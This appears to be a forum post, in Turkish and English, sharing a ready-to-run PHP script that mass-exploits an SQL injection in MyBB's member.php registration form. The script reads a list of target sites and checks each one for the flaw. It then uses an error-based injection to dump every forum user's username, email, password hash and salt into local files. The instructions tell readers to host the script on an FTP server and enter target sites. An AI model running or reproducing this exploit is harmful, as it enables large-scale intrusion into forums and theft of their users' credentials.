Yapmanız gereken bunu bir ftpye atıp çalıştırmak ve mybb siteyi yazmak
You have to upload this script in ftp and write the mybb site
You have to upload this script in ftp and write the mybb site
PHP:
<form method="post" action="">
Siteleri kutuya yazın : <br><textarea name="siteler" cols="35" rows="7"></textarea><br>
<input type="submit" value="tara">
</form>
<?php
ob_start();
set_time_limit(0);
if(!file_exists("dumpsss")) mkdir("dumpsss");
if(! $_POST['siteler']==""){
$siteler = explode("\n",$_POST['siteler']);
foreach($siteler as $sites){
$sites=trim($sites);
if(checkVulnerable($sites)) {
echo "[+] $sites Is Vulnerable!\n";
Inject($sites);
} else {
echo "[-] Target Is Not Vulnerable\n";
}
}
} else {
}
function Inject($site) {
$get_website = parse_url($site);
$website = $get_website["host"];
$html = HTTPPost("$site/member.php", "regcheck1=®check2=true&username=makman&password=mukarram&password2=mukarram&[email protected]&[email protected]&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1416039333&step=registration&action=do_register®submit=Submit+Registration!&question_id=' or polygon((select*from(select*from(select count(*) from mybb_users LIMIT 0,1)f)x))-- -");
preg_match('!select \'(.*)\' AS!s', $html, $matches);
$count = $matches[1];
echo "[+] Count: $count\n";
for($i = 0; $i <= $count; $i++) {
if($count == 1) {
$num = "0,1";
} else {
$num = "$i,1";
}
$html = HTTPPost("$site/member.php", "regcheck1=®check2=true&username=makman&password=mukarram&password2=mukarram&[email protected]&[email protected]&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1416039333&step=registration&action=do_register®submit=Submit+Registration!&question_id=' or polygon((select*from(select*from(select concat(username,0x3a,email,0x3a,password,0x3a,salt) from mybb_users LIMIT $num)f)x))-- -");
preg_match('!select \'(.*)\' AS!s', $html, $matches);
if(isset($matches[1])) {
$split = explode(":", $matches[1]);
$username = $split[0];
$email = $split[1];
$password = $split[2];
$salt = $split[3];
echo "Username: $username\nEmail: $email\nPassword: $password\nSalt: $salt\n------\n";
file_put_contents("dumpsss/$website.txt", "Username: $username\nEmail: $email\nPassword: $password\nSalt: $salt\n------\n", FILE_APPEND);
}
}
}
function checkVulnerable($site) {
$ch = curl_init();
$html = HTTPPost("$site/member.php", "regcheck1=®check2=true&username=makman&password=mukarram&password2=mukarram&[email protected]&[email protected]&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1416039333&step=registration&action=do_register®submit=Submit+Registration!&question_id='");
if(strpos($html, "You have an error in your SQL syntax")!==false) {
return true;
} else {
return false;
}
}
function HTTPPost($site, $post) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$site/member.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch,CURLOPT_POSTFIELDS, $post);
$html = curl_exec($ch);
curl_close($ch);
return $html;
}
?>